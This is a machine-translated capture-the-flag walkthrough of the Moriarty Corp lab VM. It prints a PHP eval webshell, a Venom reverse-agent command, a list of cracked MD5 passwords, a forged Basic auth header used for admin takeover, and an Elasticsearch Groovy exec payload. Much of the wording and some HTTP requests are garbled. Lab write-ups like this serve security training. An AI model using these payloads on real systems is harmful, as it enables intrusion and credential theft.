Main knowledge points investigated

The file contains Intranet penetration command upload weak password change permission HTTP Header ElasticSearch-CVE Brute force crackingCopy the code

Network topology

After writing, I also did the network topology of the target machine

 

 

Written in the book before

The VIRTUAL machine used this time is VM_VirtualBox. I used it for the first time and configured it for a long time. Because the target machine is an internal network environment, some network configurations need to be manually adjusted

 

 

The network configuration is set as above, and the IP can be scanned again. According to the MAC address, the IP of our target plane can be found.

Target machine download address:

BoredHackerBlog: Moriarty Corp

Infiltration process

IP found

The Windows environment is used for penetration testing, and Advanced_IP_Scanner is used for Intranet IP scanning

 

 

Discover IP addresses based on MAC addresses and perform port scanning for the obtained IP addresses

Port scanning

Here we use the imperial Sword port scanner for detection

 

 

Port 8000 and port 9000 are found to be suspicious, and WEB access is performed

WEB penetration

Accessing port 8000

 

Is a page for submitting flag, which also shows our task progress. First, submit the first flag according to the prompts

Display the new prompt again

 

 

Combined with the powerful Baidu Translate and Google Translate, it seems to be clear that let’s start infiltrating from port 80, then submit flag here, and access port 80 again at this time

 

 

Access is now clear, and our infiltration process is officially underway

 

 

Suspected file inclusion vulnerability was found according to the URL. Try to read sensitive data

 

 

After successfully reading the /etc/passwd file, let’s construct to see if webshell can be included remotely

The webshell is first constructed on the local server

<? php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ? >Copy the code

Try remote file include

 

 

Successfully included the remote file, using the ant sword to link the Webshell

 

Look for information on flags and next steps

The flag file was found in the root directory. Procedure

 

 

Submit on page 8000 and give us a hint again after submission

 

 

The next step is to forward traffic to infiltrate the Intranet. The next step is to forward traffic to infiltrate the Intranet

Intranet penetration – Set the proxy

Set the Intranet proxy. There are many ways to set the Intranet proxy. You can also use MSF for the whole test because Venom&proxifier is used to forward traffic for convenience

Upload the agent node first

 

 

Start the Admin program listener on Windows

admin.exe -lport 9999
Copy the code

On the Agent, change the program permission to 777 and run the following command

/agent_linux_x64 -rhost 192.168.1.101 -rport 9999Copy the code

 

 

Data is successfully monitored

Example Set the SOck5 proxy

 

 

Set the proxifier

 

Attempt Intranet access to the target

 

 

Successful visit

The next step is to conduct specific Intranet roaming

First of all, obtain the target aircraft surviving on the Intranet and scan it according to the network segment prompted by the question

 

 

A web page for target 172.17.0.4 is found

 

 

It was found to be a file upload point, and we need to input the password to upload successfully. First, burp capture the packet, and run the common weak password

 

 

Caught the package, try fuzz password

When weak password password is tried, successful upload is displayed…

 

 

According to the feedback page, try visiting our Webshell

 

 

Code execution success, successful upload, ant sword connection

 

 

Find a Flag file again and try to submit it on page 8000

Again, the page gives a hint

 

We were given a user name and an encrypted password to try SSH login after cracking the hashed password

username:
root
toor
admin
mcorp
moriarty
Copy the code
password:
63a9f0ea7bb98050796b649e85481845
7b24afc8bc80e548d66c4e7ff72171c5
5f4dcc3b5aa765d61d8327deb882cf99
21232f297a57a5a743894a0e4a801fc3
084e0343a0486ff05530df6c705c8bb4
697c6cc76fdbde5baccb7b3400391e30
8839cfc8a0f24eb155ae3f7f205f5cbc
35ac704fe1cc7807c914af478f20fd35
b27a803ed346fbbf6d2e2eb88df1c51b
08552d48aa6d6d9c05dd67f1b4ba8747
Copy the code

Cmd5 = somD5 = somD5 = somD5 = somD5 = somD5

Hash value clear
63a9f0ea7bb98050796b649e85481845 root
7b24afc8bc80e548d66c4e7ff72171c5 toor
5f4dcc3b5aa765d61d8327deb882cf99 password
21232f297a57a5a743894a0e4a801fc3 admin
084e0343a0486ff05530df6c705c8bb4 guest
697c6cc76fdbde5baccb7b3400391e30 MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc MCORP
35ac704fe1cc7807c914af478f20fd35 mcorp
b27a803ed346fbbf6d2e2eb88df1c51b weapons
08552d48aa6d6d9c05dd67f1b4ba8747 moriarty

Scan the machine with port 22 on the Intranet again

 

 

It was found that SSH port 172.17.0.5 was open. According to the obtained information, a dictionary was constructed and the SSH blasting tool was used for blasting (finally, the successful blasting was carried out using Hydra).

 

 

The obtained password is:

root / weapons
Copy the code

Log in using Xshell

 

 

Flag is obtained again

We submitted on port 8000 to update the hint again

 

There is also a chat program on the Intranet, and the port is not 80. Let’s scan the specified ports. At the same time, an account is given, and let’s get the records of the administrator user

 

 

Port 8000 on 172.17.0.6 is open

 

 

Prompt we need to login, according to the prompt to our account login

Here are the credentials our agent has obtained from another source:
username: buyer13
password: arms13
Copy the code

Log in successfully

 

 

Discover the site has two functions, check chat history, change password, try to visit the change password page, grab the package, see if there is any user password reset

Example Change the user name to admin

 

 

The packet is scanned and a problem is found in the header

 

 

Authorization: Basic YnV5ZXIxMzphcm1zMTM=
Copy the code

To decrypt the

 

With the name and password of the user, let’s try to construct the identity of the administrator and change the password to admin

Authorization: Basic YWRtaW46YWRtaW4=
Copy the code

Go back to the Web page, log in again, or change the header access

 

 

 

 

Successfully logged in to user admin to access chats

 

 

Get the flag again and submit

 

 

I looked along while, this is not ES, recently do the project is using things, is really qiaoer his mother to qiaoer open the door, Qiaoer home, scan a network segment 9200 port

 

 

Go to the page, the standard ES search page

 

 

Try ES’s arbitrary code execution vulnerability

Construct a packet to create a piece of data

POST /mitian/ Mitian6 / HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 19 Pragma: no-cache cache-control: No-cache upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 the content-type: text/plain Accept: text/HTML and application/XHTML + XML, application/XML. Q = 0.9, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q = 0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept - Encoding: gzip, deflate the Accept - Language: useful - CN, useful; Q =0.9 Connection: close {"name": "PDSDT "}Copy the code

 

 

The search page is then constructed

POST /_search? Pretty HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 156 Pragma: no-cache cache-control: No-cache upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 the content-type: text/plain Accept: text/HTML and application/XHTML + XML, application/XML. Q = 0.9, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q = 0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept - Encoding: gzip, deflate the Accept - Language: useful - CN, useful; Q =0.9 Connection: close {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("ls").getText()"}}}Copy the code

 

 

Execute command successfully, read the flag

 

 

The flag file is successfully obtained and submitted

 

 

Show the mission completed, and added our IP to the blacklist, really kick ass

conclusion

The drone spent most of my time, main or adjusting at the top of the network configuration, network the drone of each is not too difficult, how important is through the use of forward the flow after the correct tools to achieve the purpose of scanning port blasting service, the overall results are high, while it is true and real environment in which difference is bigger, However, RECENTLY I was using ES products, and I also took this opportunity to strengthen my learning of ES related vulnerabilities.

The problem

Do you have any friends who want to learn network security but don’t know how to start?

I sorted out most of the learning materials here, there is no need